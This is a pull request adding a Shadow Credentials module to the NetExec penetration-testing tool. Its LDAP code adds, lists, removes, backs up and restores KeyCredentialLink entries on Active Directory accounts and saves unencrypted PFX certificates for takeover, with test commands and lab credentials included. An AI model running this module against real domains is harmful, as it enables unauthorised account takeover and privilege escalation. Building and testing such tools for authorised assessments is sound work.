### PR TITLE
Add Shadow Credentials module

### DIFF
--- a/nxc/modules/shadow-creds.py
+++ b/nxc/modules/shadow-creds.py
@@ -174,15 +174,23 @@ class NXCModule:
         _, credential = result
         self.context.log.success(f"KeyCredential {self.device_id} on {self.target}")
         for name, value in {
-            "Device ID": credential.DeviceId.toFormatD().lower(),
             "Owner": credential.Owner,
-            "Version": getattr(credential.Version, "value", credential.Version),
-            "Identifier": credential.Identifier,
-            "Usage": getattr(credential.Usage, "name", credential.Usage),
-            "Source": getattr(credential.Source, "name", credential.Source),
-            "Creation time": credential.CreationTime,
+            "Version": hex(credential.Version.value),
+            "Key ID": credential.Identifier,
+            "Key hash": credential.KeyHash.hex(),
             "Key size": getattr(credential.RawKeyMaterial, "keySize", "unknown"),
-            "Public exponent": getattr(credential.RawKeyMaterial, "exponent", "unknown"),
+            "  Exponent (E)": credential.RawKeyMaterial.exponent,
+            "  Modulus (N)": hex(credential.RawKeyMaterial.modulus),
+            "  Prime 1 (P)": hex(credential.RawKeyMaterial.prime1),
+            "  Prime 2 (Q)": hex(credential.RawKeyMaterial.prime2),
+            "Usage": credential.Usage,
+            "Legacy usage": credential.LegacyUsage,
+            "Source": credential.Source,
+            "Device ID": credential.DeviceId.toFormatD().lower(),
+            "Custom key info": credential.CustomKeyInfo,
+            **{f"  {key}": custom_value for key, custom_value in credential.CustomKeyInfo.items()},
+            "Last logon time": credential.LastLogonTime,
+            "Creation time": credential.CreationTime,
         }.items():
             self.context.log.highlight(f"{name:<17} {value}")
 

--- a/nxc/modules/shadow-creds.py
+++ b/nxc/modules/shadow-creds.py
@@ -1,3 +1,4 @@
+import json
 from pathlib import Path
 from sys import exit
 
@@ -8,7 +9,7 @@ from dsinternals.common.data.DNWithBinary import DNWithBinary
 from dsinternals.common.data.hello.KeyCredential import KeyCredential
 from dsinternals.system.DateTime import DateTime
 from dsinternals.system.Guid import Guid
-from impacket.ldap.ldap import MODIFY_ADD, MODIFY_DELETE
+from impacket.ldap.ldap import MODIFY_ADD, MODIFY_DELETE, MODIFY_REPLACE
 
 from nxc.helpers.misc import CATEGORY
 from nxc.parsers.ldap_results import parse_result_attributes
@@ -23,34 +24,41 @@ class NXCModule:
     """
 
     name = "shadow-creds"
-    description = "List, add, inspect, or remove Shadow Credentials from a computer"
+    description = "List, add, inspect, remove, backup, or revert Shadow Credentials on a computer"
     supported_protocols = ["ldap"]
     category = CATEGORY.PRIVILEGE_ESCALATION
 
     def options(self, context, module_options):
         """
         TARGET      sAMAccountName of the target computer (for example, TARGET=DESKTOP-123456$)
-        ACTION      Action to perform: list, add, info, or remove (default: list)
+        ACTION      Action to perform: list, add, info, remove, backup, or revert (default: list)
         DEVICE_ID   KeyCredential device ID; required for info and remove
+        JSONFILE    JSON backup path; required for revert and optional for backup
 
         Examples:
         netexec ldap <dc> -u <user> -p <password> -M shadow-creds -o TARGET=DESKTOP-123456$ ACTION=list
         netexec ldap <dc> -u <user> -p <password> -M shadow-creds -o TARGET=DESKTOP-123456$ ACTION=add
         netexec ldap <dc> -u <user> -p <password> -M shadow-creds -o TARGET=DESKTOP-123456$ ACTION=info DEVICE_ID=<guid>
         netexec ldap <dc> -u <user> -p <password> -M shadow-creds -o TARGET=DESKTOP-123456$ ACTION=remove DEVICE_ID=<guid>
+        netexec ldap <dc> -u <user> -p <password> -M shadow-creds -o TARGET=DESKTOP-123456$ ACTION=backup JSONFILE=shadow-creds.json
+        netexec ldap <dc> -u <user> -p <password> -M shadow-creds -o TARGET=DESKTOP-123456$ ACTION=revert JSONFILE=shadow-creds.json
         """
         self.target = module_options.get("TARGET", "").strip()
         self.action = module_options.get("ACTION", "list").lower().strip()
         self.device_id = module_options.get("DEVICE_ID")
+        self.jsonfile = module_options.get("JSONFILE")
 
         if not self.target:
             context.log.fail("TARGET is required")
             exit(1)
-        if self.action not in {"list", "add", "info", "remove"}:
-            context.log.fail("ACTION must be one of: add, info, list, remove")
+        if self.action not in {"list", "add", "info", "remove", "backup", "revert"}:
+            context.log.fail("ACTION must be one of: list, add, info, remove, backup, revert")
             exit(1)
         if self.action in {"info", "remove"} and not self.device_id:
             context.log.fail(f"DEVICE_ID is required for ACTION={self.action}")
+            exit(1)
+        if self.action == "revert" and not self.jsonfile:
+            context.log.fail("JSONFILE is required for ACTION=revert")
             exit(1)
 
     def on_login(self, context, connection):
@@ -68,16 +76,20 @@ class NXCModule:
 
         target_dn = resp_parsed[0]["distinguishedName"]
         raw_values = resp_parsed[0].get("msDS-KeyCredentialLink", [])
-        credentials = self.parse_credentials(raw_values if isinstance(raw_values, list) else [raw_values])
+        raw_values = raw_values if isinstance(raw_values, list) else [raw_values]
 
         if self.action == "list":
-            self.list(credentials)
+            self.list(self.parse_credentials(raw_values))
         elif self.action == "add":
             self.add(target_dn)
         elif self.action == "info":
-            self.info(credentials)
+            self.info(self.parse_credentials(raw_values))
         elif self.action == "remove":
-            self.remove(target_dn, credentials)
+            self.remove(target_dn, self.parse_credentials(raw_values))
+        elif self.action == "backup":
+            self.backup(raw_values)
+        elif self.action == "revert":
+            self.revert(target_dn)
 
     def parse_credentials(self, raw_values):
         credentials = []
@@ -87,7 +99,7 @@ class NXCModule:
                 credentials.append(
                     (
                         raw_value,
-                        KeyCredential.fromDNWithBinary(DNWithBinary.fromRawDNWithBinary(raw_value.encode("utf-8") if isinstance(raw_value, str) else bytes(raw_value))),
+                        KeyCredential.fromDNWithBinary(DNWithBinary.fromRawDNWithBinary(raw_value.encode())),
                     )
                 )
             except Exception as e:
@@ -188,3 +200,35 @@ class NXCModule:
             return
 
         self.context.log.success(f"Removed KeyCredential {self.device_id} from {self.target}")
+
+    def backup(self, raw_values):
+        key_credentials = []
+        for raw_value in raw_values:
+            try:
+                key_credentials.append(KeyCredential.fromDNWithBinary(DNWithBinary.fromRawDNWithBinary(raw_value.encode())).toDict())
+            except Exception as e:
+                self.context.log.fail(f"Could not serialize an existing KeyCredential, preserving its raw value: {e}")
+                key_credentials.append(raw_value)
+
+        output_path = Path(self.jsonfile) if self.jsonfile else Path(NXC_PATH) / "modules" / "shadow-creds" / f"{self.target.rstrip('$')}.json"
+        output_path.parent.mkdir(parents=True, exist_ok=True)
+        output_path.write_text(json.dumps({"keyCredentials": key_credentials}, indent=4))
+        self.context.log.success(f"Backed up {len(key_credentials)} KeyCredential(s) from {self.target} to {output_path}")
+
+    def revert(self, target_dn):
+        try:
+            key_credentials = []
+            for key_credential in json.loads(Path(self.jsonfile).read_text())["keyCredentials"]:
+                if not isinstance(key_credential, (dict, str)):
+                    raise ValueError("keyCredentials entries must be objects or strings")
+                key_credentials.append(KeyCredential.fromDict(key_credential).toDNWithBinary().toString() if isinstance(key_credential, dict) else key_credential)
+        except Exception as e:
+            self.context.log.fail(f"Failed to read Shadow Credentials backup: {e}")
+            return
+
+        try:
+            self.connection.ldap_connection.modify(target_dn, {"msDS-KeyCredentialLink": [(MODIFY_REPLACE, key_credentials)]})
+        except Exception as e:
+            self.context.log.fail(f"Failed to revert Shadow Credentials: {e}")
+            return
+        self.context.log.success(f"Reverted {self.target} to {len(key_credentials)} backed-up KeyCredential(s)")

--- a/nxc/modules/shadow-creds.py
+++ b/nxc/modules/shadow-creds.py
@@ -50,16 +50,16 @@ class NXCModule:
 
         if not self.target:
             context.log.fail("TARGET is required")
-            exit(1)
+            return False
         if self.action not in {"list", "add", "info", "remove", "backup", "revert"}:
             context.log.fail("ACTION must be one of: list, add, info, remove, backup, revert")
-            exit(1)
+            return False
         if self.action in {"info", "remove"} and not self.device_id:
             context.log.fail(f"DEVICE_ID is required for ACTION={self.action}")
-            exit(1)
+            return False
         if self.action == "revert" and not self.jsonfile:
             context.log.fail("JSONFILE is required for ACTION=revert")
-            exit(1)
+            return False
 
     def on_login(self, context, connection):
         self.context = context

--- a/nxc/modules/shadow-creds.py
+++ b/nxc/modules/shadow-creds.py
@@ -175,6 +175,7 @@ class NXCModule:
         self.context.log.success(f"KeyCredential {self.device_id} on {self.target}")
         for name, value in {
             "Owner": credential.Owner,
+            "Device ID": credential.DeviceId.toFormatD().lower(),
             "Version": hex(credential.Version.value),
             "Key ID": credential.Identifier,
             "Key hash": credential.KeyHash.hex(),
@@ -186,7 +187,6 @@ class NXCModule:
             "Usage": credential.Usage,
             "Legacy usage": credential.LegacyUsage,
             "Source": credential.Source,
-            "Device ID": credential.DeviceId.toFormatD().lower(),
             "Custom key info": credential.CustomKeyInfo,
             **{f"  {key}": custom_value for key, custom_value in credential.CustomKeyInfo.items()},
             "Last logon time": credential.LastLogonTime,

--- a/nxc/modules/shadow-creds.py
+++ b/nxc/modules/shadow-creds.py
@@ -9,7 +9,7 @@ from dsinternals.common.data.DNWithBinary import DNWithBinary
 from dsinternals.common.data.hello.KeyCredential import KeyCredential
 from dsinternals.system.DateTime import DateTime
 from dsinternals.system.Guid import Guid
-from impacket.ldap.ldap import MODIFY_ADD, MODIFY_DELETE, MODIFY_REPLACE
+from impacket.ldap.ldap import MODIFY_ADD, MODIFY_DELETE, MODIFY_REPLACE, LDAPSessionError
 
 from nxc.helpers.misc import CATEGORY
 from nxc.parsers.ldap_results import parse_result_attributes
@@ -142,7 +142,7 @@ class NXCModule:
         try:
             # Add one value instead of replacing the complete multi-valued attribute.
             self.connection.ldap_connection.modify(target_dn, {"msDS-KeyCredentialLink": [(MODIFY_ADD, [ldap_value])]})
-        except Exception as e:
+        except LDAPSessionError as e:
             self.context.log.fail(f"Failed to add the KeyCredential: {e}")
             self.context.log.display(f"Generated PFX retained at {output_path}")
             return
@@ -203,7 +203,7 @@ class NXCModule:
         try:
             # Delete the exact raw value so neighboring credentials remain untouched.
             self.connection.ldap_connection.modify(target_dn, {"msDS-KeyCredentialLink": [(MODIFY_DELETE, [raw_value])]})
-        except Exception as e:
+        except LDAPSessionError as e:
             self.context.log.fail(f"Failed to remove the KeyCredential: {e}")
             return
 

--- a/nxc/modules/shadow-creds.py
+++ b/nxc/modules/shadow-creds.py
@@ -212,13 +212,13 @@ class NXCModule:
 
         output_path = Path(self.jsonfile) if self.jsonfile else Path(NXC_PATH) / "modules" / "shadow-creds" / f"{self.target.rstrip('$')}.json"
         output_path.parent.mkdir(parents=True, exist_ok=True)
-        output_path.write_text(json.dumps({"keyCredentials": key_credentials}, indent=4))
+        output_path.write_text(json.dumps({"keyCredentials": key_credentials}, indent=4), encoding="utf-8")
         self.context.log.success(f"Backed up {len(key_credentials)} KeyCredential(s) from {self.target} to {output_path}")
 
     def revert(self, target_dn):
         try:
             key_credentials = []
-            for key_credential in json.loads(Path(self.jsonfile).read_text())["keyCredentials"]:
+            for key_credential in json.loads(Path(self.jsonfile).read_text(encoding="utf-8"))["keyCredentials"]:
                 if not isinstance(key_credential, (dict, str)):
                     raise ValueError("keyCredentials entries must be objects or strings")
                 key_credentials.append(KeyCredential.fromDict(key_credential).toDNWithBinary().toString() if isinstance(key_credential, dict) else key_credential)

--- a/nxc/modules/shadow-creds.py
+++ b/nxc/modules/shadow-creds.py
@@ -24,13 +24,13 @@ class NXCModule:
     """
 
     name = "shadow-creds"
-    description = "List, add, inspect, remove, backup, or revert Shadow Credentials on a computer"
+    description = "List, add, inspect, remove, backup, or revert Shadow Credentials on a user or computer"
     supported_protocols = ["ldap"]
     category = CATEGORY.PRIVILEGE_ESCALATION
 
     def options(self, context, module_options):
         """
-        TARGET      sAMAccountName of the target computer (for example, TARGET=DESKTOP-123456$)
+        TARGET      sAMAccountName of the target user or computer (for example, TARGET=user or TARGET=DESKTOP-123456$)
         ACTION      Action to perform: list, add, info, remove, backup, or revert (default: list)
         DEVICE_ID   KeyCredential device ID; required for info and remove
         JSONFILE    JSON backup path; required for revert and optional for backup
@@ -66,12 +66,12 @@ class NXCModule:
         self.connection = connection
 
         resp = connection.search(
-            searchFilter=f"(&(objectClass=computer)(sAMAccountName={self.target}))",
-            attributes=["distinguishedName", "sAMAccountName", "msDS-KeyCredentialLink"],
+            searchFilter=f"(&(objectClass=user)(sAMAccountName={self.target}))",
+            attributes=["distinguishedName", "sAMAccountName", "objectClass", "msDS-KeyCredentialLink"],
         )
         resp_parsed = parse_result_attributes(resp)
         if not resp_parsed:
-            context.log.fail(f"Computer '{self.target}' was not found")
+            context.log.fail(f"Account '{self.target}' was not found")
             return
 
         target_dn = resp_parsed[0]["distinguishedName"]
@@ -81,7 +81,7 @@ class NXCModule:
         if self.action == "list":
             self.list(self.parse_credentials(raw_values))
         elif self.action == "add":
-            self.add(target_dn)
+            self.add(target_dn, "computer" in resp_parsed[0]["objectClass"])
         elif self.action == "info":
             self.info(self.parse_credentials(raw_values))
         elif self.action == "remove":
@@ -122,7 +122,7 @@ class NXCModule:
         for _, credential in credentials:
             self.context.log.highlight(f"Device ID: {credential.DeviceId.toFormatD().lower() if credential.DeviceId else '<missing>'} | Creation time: {credential.CreationTime}")
 
-    def add(self, target_dn):
+    def add(self, target_dn, is_computer):
         try:
             certificate = X509Certificate2(subject=self.target, keySize=2048, notBefore=-(40 * 365), notAfter=40 * 365)
             credential = KeyCredential.fromX509Certificate2(
@@ -130,7 +130,7 @@ class NXCModule:
                 deviceId=Guid(),
                 owner=target_dn,
                 currentTime=DateTime(),
-                isComputerKey=True,
+                isComputerKey=is_computer,
             )
             device_id = credential.DeviceId.toFormatD().lower()
             ldap_value = credential.toDNWithBinary().toString()

--- a/nxc/modules/shadow-creds.py
+++ b/nxc/modules/shadow-creds.py
@@ -202,18 +202,10 @@ class NXCModule:
         self.context.log.success(f"Removed KeyCredential {self.device_id} from {self.target}")
 
     def backup(self, raw_values):
-        key_credentials = []
-        for raw_value in raw_values:
-            try:
-                key_credentials.append(KeyCredential.fromDNWithBinary(DNWithBinary.fromRawDNWithBinary(raw_value.encode())).toDict())
-            except Exception as e:
-                self.context.log.fail(f"Could not serialize an existing KeyCredential, preserving its raw value: {e}")
-                key_credentials.append(raw_value)
-
         output_path = Path(self.jsonfile) if self.jsonfile else Path(NXC_PATH) / "modules" / "shadow-creds" / f"{self.target.rstrip('$')}.json"
         output_path.parent.mkdir(parents=True, exist_ok=True)
-        output_path.write_text(json.dumps({"keyCredentials": key_credentials}, indent=4), encoding="utf-8")
-        self.context.log.success(f"Backed up {len(key_credentials)} KeyCredential(s) from {self.target} to {output_path}")
+        output_path.write_text(json.dumps({"keyCredentials": raw_values}, indent=4), encoding="utf-8")
+        self.context.log.success(f"Backed up {len(raw_values)} KeyCredential(s) from {self.target} to {output_path}")
 
     def revert(self, target_dn):
         try:

--- a/nxc/modules/shadow-creds.py
+++ b/nxc/modules/shadow-creds.py
@@ -1,0 +1,190 @@
+from pathlib import Path
+from sys import exit
+
+from cryptography.hazmat.primitives.serialization import NoEncryption
+from cryptography.hazmat.primitives.serialization.pkcs12 import serialize_key_and_certificates
+from dsinternals.common.cryptography.X509Certificate2 import X509Certificate2
+from dsinternals.common.data.DNWithBinary import DNWithBinary
+from dsinternals.common.data.hello.KeyCredential import KeyCredential
+from dsinternals.system.DateTime import DateTime
+from dsinternals.system.Guid import Guid
+from impacket.ldap.ldap import MODIFY_ADD, MODIFY_DELETE
+
+from nxc.helpers.misc import CATEGORY
+from nxc.parsers.ldap_results import parse_result_attributes
+from nxc.paths import NXC_PATH
+
+
+class NXCModule:
+    """
+    Made by @NeffIsBack
+    Heavily inspired by the pyWhisker project by Shutdown:
+    https://github.com/ShutdownRepo/pywhisker
+    """
+
+    name = "shadow-creds"
+    description = "List, add, inspect, or remove Shadow Credentials from a computer"
+    supported_protocols = ["ldap"]
+    category = CATEGORY.PRIVILEGE_ESCALATION
+
+    def options(self, context, module_options):
+        """
+        TARGET      sAMAccountName of the target computer (for example, TARGET=DESKTOP-123456$)
+        ACTION      Action to perform: list, add, info, or remove (default: list)
+        DEVICE_ID   KeyCredential device ID; required for info and remove
+
+        Examples:
+        netexec ldap <dc> -u <user> -p <password> -M shadow-creds -o TARGET=DESKTOP-123456$ ACTION=list
+        netexec ldap <dc> -u <user> -p <password> -M shadow-creds -o TARGET=DESKTOP-123456$ ACTION=add
+        netexec ldap <dc> -u <user> -p <password> -M shadow-creds -o TARGET=DESKTOP-123456$ ACTION=info DEVICE_ID=<guid>
+        netexec ldap <dc> -u <user> -p <password> -M shadow-creds -o TARGET=DESKTOP-123456$ ACTION=remove DEVICE_ID=<guid>
+        """
+        self.target = module_options.get("TARGET", "").strip()
+        self.action = module_options.get("ACTION", "list").lower().strip()
+        self.device_id = module_options.get("DEVICE_ID")
+
+        if not self.target:
+            context.log.fail("TARGET is required")
+            exit(1)
+        if self.action not in {"list", "add", "info", "remove"}:
+            context.log.fail("ACTION must be one of: add, info, list, remove")
+            exit(1)
+        if self.action in {"info", "remove"} and not self.device_id:
+            context.log.fail(f"DEVICE_ID is required for ACTION={self.action}")
+            exit(1)
+
+    def on_login(self, context, connection):
+        self.context = context
+        self.connection = connection
+
+        resp = connection.search(
+            searchFilter=f"(&(objectClass=computer)(sAMAccountName={self.target}))",
+            attributes=["distinguishedName", "sAMAccountName", "msDS-KeyCredentialLink"],
+        )
+        resp_parsed = parse_result_attributes(resp)
+        if not resp_parsed:
+            context.log.fail(f"Computer '{self.target}' was not found")
+            return
+
+        target_dn = resp_parsed[0]["distinguishedName"]
+        raw_values = resp_parsed[0].get("msDS-KeyCredentialLink", [])
+        credentials = self.parse_credentials(raw_values if isinstance(raw_values, list) else [raw_values])
+
+        if self.action == "list":
+            self.list(credentials)
+        elif self.action == "add":
+            self.add(target_dn)
+        elif self.action == "info":
+            self.info(credentials)
+        elif self.action == "remove":
+            self.remove(target_dn, credentials)
+
+    def parse_credentials(self, raw_values):
+        credentials = []
+        for raw_value in raw_values:
+            try:
+                # AD stores each KeyCredential as a textual DN-Binary value.
+                credentials.append(
+                    (
+                        raw_value,
+                        KeyCredential.fromDNWithBinary(DNWithBinary.fromRawDNWithBinary(raw_value.encode("utf-8") if isinstance(raw_value, str) else bytes(raw_value))),
+                    )
+                )
+            except Exception as e:
+                self.context.log.fail(f"Could not parse an existing KeyCredential: {e}")
+        return credentials
+
+    def get_credential(self, credentials):
+        for raw_value, credential in credentials:
+            if credential.DeviceId and credential.DeviceId.toFormatD().lower() == self.device_id:
+                return raw_value, credential
+        self.context.log.fail(f"No KeyCredential with device ID {self.device_id} was found on {self.target}")
+        return None
+
+    def list(self, credentials):
+        if not credentials:
+            self.context.log.display(f"No KeyCredentials found on {self.target}")
+            return
+
+        self.context.log.success(f"Found {len(credentials)} KeyCredential(s) on {self.target}")
+        for _, credential in credentials:
+            self.context.log.highlight(f"Device ID: {credential.DeviceId.toFormatD().lower() if credential.DeviceId else '<missing>'} | Creation time: {credential.CreationTime}")
+
+    def add(self, target_dn):
+        try:
+            certificate = X509Certificate2(subject=self.target, keySize=2048, notBefore=-(40 * 365), notAfter=40 * 365)
+            credential = KeyCredential.fromX509Certificate2(
+                certificate=certificate,
+                deviceId=Guid(),
+                owner=target_dn,
+                currentTime=DateTime(),
+                isComputerKey=True,
+            )
+            device_id = credential.DeviceId.toFormatD().lower()
+            ldap_value = credential.toDNWithBinary().toString()
+            output_path = self.write_pfx(certificate, device_id)
+        except Exception as e:
+            self.context.log.fail(f"Failed to generate certificate and KeyCredential: {e}")
+            return
+
+        try:
+            # Add one value instead of replacing the complete multi-valued attribute.
+            self.connection.ldap_connection.modify(target_dn, {"msDS-KeyCredentialLink": [(MODIFY_ADD, [ldap_value])]})
+        except Exception as e:
+            self.context.log.fail(f"Failed to add the KeyCredential: {e}")
+            self.context.log.display(f"Generated PFX retained at {output_path}")
+            return
+
+        self.context.log.success(f"Added KeyCredential with device ID {device_id} to {self.target}")
+        self.context.log.highlight(f"PFX: {output_path}")
+
+    def write_pfx(self, certificate, device_id):
+        output_dir = Path(NXC_PATH) / "modules" / "shadow-creds"
+        output_dir.mkdir(parents=True, exist_ok=True)
+        output_path = output_dir / f"{self.target.rstrip('$')}_{device_id}.pfx"
+
+        output_path.write_bytes(
+            serialize_key_and_certificates(
+                name=self.target.encode("utf-8"),
+                key=certificate.key.to_cryptography_key(),
+                cert=certificate.certificate.to_cryptography(),
+                cas=None,
+                encryption_algorithm=NoEncryption(),
+            )
+        )
+        return output_path
+
+    def info(self, credentials):
+        result = self.get_credential(credentials)
+        if result is None:
+            return
+
+        _, credential = result
+        self.context.log.success(f"KeyCredential {self.device_id} on {self.target}")
+        for name, value in {
+            "Device ID": credential.DeviceId.toFormatD().lower(),
+            "Owner": credential.Owner,
+            "Version": getattr(credential.Version, "value", credential.Version),
+            "Identifier": credential.Identifier,
+            "Usage": getattr(credential.Usage, "name", credential.Usage),
+            "Source": getattr(credential.Source, "name", credential.Source),
+            "Creation time": credential.CreationTime,
+            "Key size": getattr(credential.RawKeyMaterial, "keySize", "unknown"),
+            "Public exponent": getattr(credential.RawKeyMaterial, "exponent", "unknown"),
+        }.items():
+            self.context.log.highlight(f"{name:<17} {value}")
+
+    def remove(self, target_dn, credentials):
+        result = self.get_credential(credentials)
+        if result is None:
+            return
+
+        raw_value, _ = result
+        try:
+            # Delete the exact raw value so neighboring credentials remain untouched.
+            self.connection.ldap_connection.modify(target_dn, {"msDS-KeyCredentialLink": [(MODIFY_DELETE, [raw_value])]})
+        except Exception as e:
+            self.context.log.fail(f"Failed to remove the KeyCredential: {e}")
+            return
+
+        self.context.log.success(f"Removed KeyCredential {self.device_id} from {self.target}")

--- a/nxc/modules/shadow-creds.py
+++ b/nxc/modules/shadow-creds.py
@@ -1,6 +1,5 @@
 import json
 from pathlib import Path
-from sys import exit
 
 from cryptography.hazmat.primitives.serialization import NoEncryption
 from cryptography.hazmat.primitives.serialization.pkcs12 import serialize_key_and_certificates

--- a/nxc/modules/shadow-creds.py
+++ b/nxc/modules/shadow-creds.py
@@ -108,7 +108,7 @@ class NXCModule:
 
     def get_credential(self, credentials):
         for raw_value, credential in credentials:
-            if credential.DeviceId and credential.DeviceId.toFormatD().lower() == self.device_id:
+            if credential.DeviceId and credential.DeviceId.toFormatD().lower() == self.device_id.lower():
                 return raw_value, credential
         self.context.log.fail(f"No KeyCredential with device ID {self.device_id} was found on {self.target}")
         return None

--- a/tests/e2e_commands.txt
+++ b/tests/e2e_commands.txt
@@ -245,8 +245,11 @@ netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M whoami
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M dump-computers
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M raisechild
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M get-scriptpath
-# Shadow Credentials needs a writable, disposable computer object. Run these manually with a real target and use the device ID printed by ACTION=add.
-#netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M shadow-creds -o TARGET=SHADOW_CREDS_TARGET$ ACTION=list
+# Backup followed by revert restores the same Shadow Credentials state on the disposable test computer.
+netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M shadow-creds -o TARGET=CASTELBLACK$ ACTION=list
+netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M shadow-creds -o TARGET=CASTELBLACK$ ACTION=backup JSONFILE=nxc-shadow-creds-castelblack.json
+netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M shadow-creds -o TARGET=CASTELBLACK$ ACTION=revert JSONFILE=nxc-shadow-creds-castelblack.json
+# These actions require the generated device ID for an automated round trip.
 #netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M shadow-creds -o TARGET=SHADOW_CREDS_TARGET$ ACTION=add
 #netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M shadow-creds -o TARGET=SHADOW_CREDS_TARGET$ ACTION=info DEVICE_ID=SHADOW_CREDS_DEVICE_ID
 #netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M shadow-creds -o TARGET=SHADOW_CREDS_TARGET$ ACTION=remove DEVICE_ID=SHADOW_CREDS_DEVICE_ID

--- a/tests/e2e_commands.txt
+++ b/tests/e2e_commands.txt
@@ -245,6 +245,11 @@ netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M whoami
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M dump-computers
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M raisechild
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M get-scriptpath
+# Shadow Credentials needs a writable, disposable computer object. Run these manually with a real target and use the device ID printed by ACTION=add.
+#netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M shadow-creds -o TARGET=SHADOW_CREDS_TARGET$ ACTION=list
+#netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M shadow-creds -o TARGET=SHADOW_CREDS_TARGET$ ACTION=add
+#netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M shadow-creds -o TARGET=SHADOW_CREDS_TARGET$ ACTION=info DEVICE_ID=SHADOW_CREDS_DEVICE_ID
+#netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M shadow-creds -o TARGET=SHADOW_CREDS_TARGET$ ACTION=remove DEVICE_ID=SHADOW_CREDS_DEVICE_ID
 # resetnightmare resets a real account password with no restore and needs a controlled account with GenericWrite on its UPN + an unpatched DC, run manually, not in CI
 #netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M resetnightmare -o TARGET=TARGET_ACCOUNT NEW_PASSWORD=Password123! UPN_USER=CONTROLLED_ACCOUNT UPN_PASSWORD=Password1
 ##### WINRM


### PR DESCRIPTION
## Description
Adds shadow credentials module, heavily inspired by pyWhisker: https://github.com/ShutdownRepo/pywhisker
Similar to pyWhisker you can:
- list
- add
- remove
- backup
- revert
keyCredentials of computers.

Related PRs: #936, #1234

AI disclosure: I got infected and started to use codex as well. Turns out to be quite decent when adding guard rails and properly review the output. Model that was used: gpt-5.6-sol high. Reviewed the module (and with that tested the stuff obviously).

## Type of change
Insert an "x" inside the brackets for relevant items (do not delete options)

- [ ] Bug fix (non-breaking change which fixes an issue)
- [x] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] Deprecation of feature or functionality
- [ ] This change requires a documentation update
- [ ] This requires a third party update (such as Impacket, Dploot, lsassy, etc)
- [ ] This PR was created with the assistance of AI (list what type of assistance, tool(s)/model(s) in the description)

## Setup guide for the review
Execute the module, e.g.:
```bash
poetry run nxc ldap 192.168.56.11 -u eddard.stark -p FightP3aceAndHonor! -M shadow-creds -o TARGET=testcomputer$ ACTION=add
poetry run nxc ldap 192.168.56.11 -u eddard.stark -p FightP3aceAndHonor! -M shadow-creds -o TARGET=testcomputer$ ACTION=list
...
```

## Screenshots (if appropriate):
Add/list/remove:
<img width="1495" height="443" alt="image" src="https://github.com/user-attachments/assets/ca362ab1-1611-4fea-8376-5173571aaaa7" />

Get the cred info:
<img width="1581" height="640" alt="image" src="https://github.com/user-attachments/assets/faf16c86-be67-4968-a91c-896112d1f827" />

Backup&Revert:
<img width="1569" height="639" alt="image" src="https://github.com/user-attachments/assets/78df1bb4-42de-4b6f-b295-d8115c342585" />


## Checklist:

